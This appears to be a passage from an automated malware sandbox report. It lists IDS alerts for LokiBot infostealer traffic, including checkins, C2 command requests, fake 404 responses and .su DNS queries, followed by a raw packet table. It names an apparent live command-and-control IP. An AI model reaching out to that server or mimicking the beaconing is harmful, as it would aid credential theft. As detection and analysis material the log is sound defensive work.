                                192.168.2.395.213.216.20249757802024318 11/30/22-00:55:58.948901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249723802825766 11/30/22-00:54:56.463103TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249718802025381 11/30/22-00:54:47.592007TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249730802025381 11/30/22-00:55:08.823725TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249704802021641 11/30/22-00:54:18.966132TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249722802024318 11/30/22-00:54:54.732179TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249745802021641 11/30/22-00:55:36.377571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249714802024313 11/30/22-00:54:39.977728TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249725802825766 11/30/22-00:54:59.930841TCP2825766ETPRO TROJAN LokiBot Checkin M24972580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249700802025381 11/30/22-00:54:09.487691TCP2025381ET TROJAN LokiBot Checkin4970080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249714802024318 11/30/22-00:54:39.977728TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.395.213.216.202
                                192.168.2.38.8.8.858708532014169 11/30/22-00:55:15.985743UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5870853192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497282025483 11/30/22-00:55:06.759571TCP2025483ET TROJAN LokiBot Fake 404 Response804972895.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249732802024318 11/30/22-00:55:12.457821TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249707802825766 11/30/22-00:54:24.716724TCP2825766ETPRO TROJAN LokiBot Checkin M24970780192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497242025483 11/30/22-00:54:59.594972TCP2025483ET TROJAN LokiBot Fake 404 Response804972495.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249732802024313 11/30/22-00:55:12.457821TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249708802021641 11/30/22-00:54:26.803652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249724802024318 11/30/22-00:54:58.184483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249759802021641 11/30/22-00:56:01.042444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249751802025381 11/30/22-00:55:47.279515TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249724802024313 11/30/22-00:54:58.184483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249710802025381 11/30/22-00:54:31.910937TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249715802825766 11/30/22-00:54:42.060768TCP2825766ETPRO TROJAN LokiBot Checkin M24971580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249747802024318 11/30/22-00:55:40.214633TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249747802024313 11/30/22-00:55:40.214633TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249719802024313 11/30/22-00:54:49.641508TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249743802825766 11/30/22-00:55:32.962709TCP2825766ETPRO TROJAN LokiBot Checkin M24974380192.168.2.395.213.216.202
                                192.168.2.38.8.8.857571532014169 11/30/22-00:54:51.528645UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5757153192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249719802024318 11/30/22-00:54:49.641508TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249742802024318 11/30/22-00:55:31.101064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.395.213.216.202
                                192.168.2.38.8.8.859636532014169 11/30/22-00:54:37.879679UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5963653192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249720802825766 11/30/22-00:54:51.608521TCP2825766ETPRO TROJAN LokiBot Checkin M24972080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249742802024313 11/30/22-00:55:31.101064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249718802021641 11/30/22-00:54:47.592007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249733802025381 11/30/22-00:55:14.244291TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249736802021641 11/30/22-00:55:19.643476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249746802021641 11/30/22-00:55:38.275174TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249734802024318 11/30/22-00:55:16.065951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249723802025381 11/30/22-00:54:56.463103TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249748802825766 11/30/22-00:55:42.098367TCP2825766ETPRO TROJAN LokiBot Checkin M24974880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249737802024313 11/30/22-00:55:21.614296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497562025483 11/30/22-00:55:58.723099TCP2025483ET TROJAN LokiBot Fake 404 Response804975695.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249702802825766 11/30/22-00:54:14.871390TCP2825766ETPRO TROJAN LokiBot Checkin M24970280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249737802024318 11/30/22-00:55:21.614296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249730802825766 11/30/22-00:55:08.823725TCP2825766ETPRO TROJAN LokiBot Checkin M24973080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249706802024313 11/30/22-00:54:22.484255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249734802024313 11/30/22-00:55:16.065951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497352025483 11/30/22-00:55:19.347023TCP2025483ET TROJAN LokiBot Fake 404 Response804973595.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249706802024318 11/30/22-00:54:22.484255TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970680192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497522025483 11/30/22-00:55:50.930381TCP2025483ET TROJAN LokiBot Fake 404 Response804975295.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497172025483 11/30/22-00:54:47.032787TCP2025483ET TROJAN LokiBot Fake 404 Response804971795.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249733802825766 11/30/22-00:55:14.244291TCP2825766ETPRO TROJAN LokiBot Checkin M24973380192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497392025483 11/30/22-00:55:26.908255TCP2025483ET TROJAN LokiBot Fake 404 Response804973995.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249720802025381 11/30/22-00:54:51.608521TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249749802021641 11/30/22-00:55:43.976237TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.395.213.216.202
                                192.168.2.38.8.8.865320532014169 11/30/22-00:54:43.751689UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6532053192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249735802825766 11/30/22-00:55:17.863854TCP2825766ETPRO TROJAN LokiBot Checkin M24973580192.168.2.395.213.216.202
                                192.168.2.38.8.8.852079532014169 11/30/22-00:55:32.870195UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5207953192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497012025483 11/30/22-00:54:14.085146TCP2025483ET TROJAN LokiBot Fake 404 Response804970195.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249731802025381 11/30/22-00:55:10.632751TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249709802024318 11/30/22-00:54:29.164231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249745802024318 11/30/22-00:55:36.377571TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249709802024313 11/30/22-00:54:29.164231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249705802825766 11/30/22-00:54:20.168790TCP2825766ETPRO TROJAN LokiBot Checkin M24970580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249745802024313 11/30/22-00:55:36.377571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249704802024318 11/30/22-00:54:18.966132TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249704802024313 11/30/22-00:54:18.966132TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249717802024313 11/30/22-00:54:45.540558TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249722802825766 11/30/22-00:54:54.732179TCP2825766ETPRO TROJAN LokiBot Checkin M24972280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249703802025381 11/30/22-00:54:16.960834TCP2025381ET TROJAN LokiBot Checkin4970380192.168.2.395.213.216.202
                                192.168.2.38.8.8.849302532014169 11/30/22-00:54:20.078245UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related4930253192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249711802024313 11/30/22-00:54:33.859062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249728802825766 11/30/22-00:55:05.285201TCP2825766ETPRO TROJAN LokiBot Checkin M24972880192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249705802021641 11/30/22-00:54:20.168790TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249711802024318 11/30/22-00:54:33.859062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249738802021641 11/30/22-00:55:23.450513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.395.213.216.202
                                192.168.2.38.8.8.865385532014169 11/30/22-00:55:49.289719UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6538553192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249740802825766 11/30/22-00:55:27.193434TCP2825766ETPRO TROJAN LokiBot Checkin M24974080192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497452025483 11/30/22-00:55:37.973570TCP2025483ET TROJAN LokiBot Fake 404 Response804974595.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497462025483 11/30/22-00:55:39.906968TCP2025483ET TROJAN LokiBot Fake 404 Response804974695.213.216.202192.168.2.3
                                95.213.216.202192.168.2.380497402025483 11/30/22-00:55:28.902821TCP2025483ET TROJAN LokiBot Fake 404 Response804974095.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249717802024318 11/30/22-00:54:45.540558TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249701802024313 11/30/22-00:54:12.581436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249738802825766 11/30/22-00:55:23.450513TCP2825766ETPRO TROJAN LokiBot Checkin M24973880192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497132025483 11/30/22-00:54:39.587400TCP2025483ET TROJAN LokiBot Fake 404 Response804971395.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249701802024318 11/30/22-00:54:12.581436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249756802825766 11/30/22-00:55:57.533680TCP2825766ETPRO TROJAN LokiBot Checkin M24975680192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497022025483 11/30/22-00:54:16.469088TCP2025483ET TROJAN LokiBot Fake 404 Response804970295.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249750802825766 11/30/22-00:55:45.758418TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249743802021641 11/30/22-00:55:32.962709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249740802021641 11/30/22-00:55:27.193434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249729802025381 11/30/22-00:55:07.068054TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249752802024313 11/30/22-00:55:49.378987TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249741802025381 11/30/22-00:55:29.247109TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249726802025381 11/30/22-00:55:01.673863TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249752802024318 11/30/22-00:55:49.378987TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.395.213.216.202
                                192.168.2.38.8.8.856042532014169 11/30/22-00:54:35.894646UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5604253192.168.2.38.8.8.8
                                192.168.2.38.8.8.853844532014169 11/30/22-00:55:03.396283UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5384453192.168.2.38.8.8.8
                                192.168.2.38.8.8.862050532014169 11/30/22-00:54:33.763792UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6205053192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249728802021641 11/30/22-00:55:05.285201TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497512025483 11/30/22-00:55:49.068855TCP2025483ET TROJAN LokiBot Fake 404 Response804975195.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249755802024318 11/30/22-00:55:55.653974TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.395.213.216.202
                                95.213.216.202192.168.2.380497182025483 11/30/22-00:54:49.052316TCP2025483ET TROJAN LokiBot Fake 404 Response804971895.213.216.202192.168.2.3
                                192.168.2.38.8.8.852547532014169 11/30/22-00:55:01.596754UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5254753192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249755802024313 11/30/22-00:55:55.653974TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249727802024318 11/30/22-00:55:03.486766TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249713802025381 11/30/22-00:54:37.979213TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249756802021641 11/30/22-00:55:57.533680TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.395.213.216.202
                                192.168.2.38.8.8.865459532014169 11/30/22-00:55:47.178193UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related6545953192.168.2.38.8.8.8
                                95.213.216.202192.168.2.380497072025483 11/30/22-00:54:26.372322TCP2025483ET TROJAN LokiBot Fake 404 Response804970795.213.216.202192.168.2.3
                                192.168.2.395.213.216.20249715802021641 11/30/22-00:54:42.060768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249712802825766 11/30/22-00:54:35.972913TCP2825766ETPRO TROJAN LokiBot Checkin M24971280192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249753802825766 11/30/22-00:55:51.242717TCP2825766ETPRO TROJAN LokiBot Checkin M24975380192.168.2.395.213.216.202
                                192.168.2.38.8.8.854153532014169 11/30/22-00:55:51.152832UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5415353192.168.2.38.8.8.8
                                192.168.2.395.213.216.20249754802025381 11/30/22-00:55:53.496270TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.395.213.216.202
                                192.168.2.395.213.216.20249727802024313 11/30/22-00:55:03.486766TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.395.213.216.202
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 30, 2022 00:54:07.252681971 CET4969980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:07.317872047 CET804969995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:07.318666935 CET4969980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:07.324934006 CET4969980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:07.390002012 CET804969995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:07.390280008 CET4969980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:07.454189062 CET804969995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:08.932713032 CET804969995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:08.932929993 CET4969980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:08.932929993 CET4969980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:08.997078896 CET804969995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:09.427567959 CET4970080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:09.484437943 CET804970095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:09.484872103 CET4970080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:09.487690926 CET4970080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:09.545456886 CET804970095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:09.545732975 CET4970080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:09.602526903 CET804970095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:11.058943987 CET804970095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:11.059271097 CET4970080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:11.251259089 CET4970080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:11.308391094 CET804970095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:12.515145063 CET4970180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:12.578533888 CET804970195.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:12.578650951 CET4970180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:12.581435919 CET4970180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:12.644690037 CET804970195.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:12.644942999 CET4970180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:12.708281040 CET804970195.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:14.085145950 CET804970195.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:14.085324049 CET4970180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:14.085324049 CET4970180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:14.148653984 CET804970195.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:14.796390057 CET4970280192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:14.863887072 CET804970295.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:14.864324093 CET4970280192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:14.871390104 CET4970280192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:14.938833952 CET804970295.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:14.939245939 CET4970280192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:15.006510973 CET804970295.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:16.469088078 CET804970295.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:16.469213009 CET4970280192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:16.469305038 CET4970280192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:16.536587954 CET804970295.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:16.901004076 CET4970380192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:16.957978010 CET804970395.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:16.958115101 CET4970380192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:16.960834026 CET4970380192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:17.017646074 CET804970395.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:17.017842054 CET4970380192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:17.074562073 CET804970395.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:18.541620016 CET804970395.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:18.541914940 CET4970380192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:18.541914940 CET4970380192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:18.598728895 CET804970395.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:18.898685932 CET4970480192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:18.963310003 CET804970495.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:18.963515997 CET4970480192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:18.966131926 CET4970480192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:19.030903101 CET804970495.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:19.031228065 CET4970480192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:19.095748901 CET804970495.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:19.714504957 CET804970495.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:19.714649916 CET4970480192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:19.722553015 CET4970480192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:19.787149906 CET804970495.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:20.097837925 CET4970580192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:20.161624908 CET804970595.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:20.161886930 CET4970580192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:20.168790102 CET4970580192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:20.232583046 CET804970595.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:20.232693911 CET4970580192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:20.296284914 CET804970595.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:21.783216000 CET804970595.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:21.783595085 CET4970580192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:21.783595085 CET4970580192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:21.847395897 CET804970595.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:22.417725086 CET4970680192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:22.481591940 CET804970695.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:22.481817961 CET4970680192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:22.484255075 CET4970680192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:22.547919989 CET804970695.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:22.548185110 CET4970680192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:22.611813068 CET804970695.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:24.053488970 CET804970695.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:24.053700924 CET4970680192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:24.053700924 CET4970680192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:24.117465019 CET804970695.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:24.644469023 CET4970780192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:24.708810091 CET804970795.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:24.709328890 CET4970780192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:24.716723919 CET4970780192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:24.780909061 CET804970795.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:24.781121969 CET4970780192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:24.845062971 CET804970795.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:26.372322083 CET804970795.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:26.372553110 CET4970780192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:26.372901917 CET4970780192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:26.436924934 CET804970795.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:26.735404968 CET4970880192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:26.800751925 CET804970895.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:26.800952911 CET4970880192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:26.803652048 CET4970880192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:26.868796110 CET804970895.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:26.868957043 CET4970880192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:26.933984041 CET804970895.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:28.382638931 CET804970895.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:28.382777929 CET4970880192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:28.382778883 CET4970880192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:28.448436022 CET804970895.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:29.066101074 CET4970980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:29.122601986 CET804970995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:29.122786045 CET4970980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:29.164231062 CET4970980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:29.220624924 CET804970995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:29.220927000 CET4970980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:29.277586937 CET804970995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:30.691042900 CET804970995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:30.691278934 CET4970980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:30.691428900 CET4970980192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:30.747807980 CET804970995.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:31.844077110 CET4971080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:31.908207893 CET804971095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:31.908368111 CET4971080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:31.910937071 CET4971080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:31.975022078 CET804971095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:31.975130081 CET4971080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:32.039067984 CET804971095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:33.459515095 CET804971095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:33.459865093 CET4971080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:33.459933043 CET4971080192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:33.525604010 CET804971095.213.216.202192.168.2.3
                                Nov 30, 2022 00:54:33.782614946 CET4971180192.168.2.395.213.216.202
                                Nov 30, 2022 00:54:33.839637041 CET804971195.213.216.202192.168.2.3
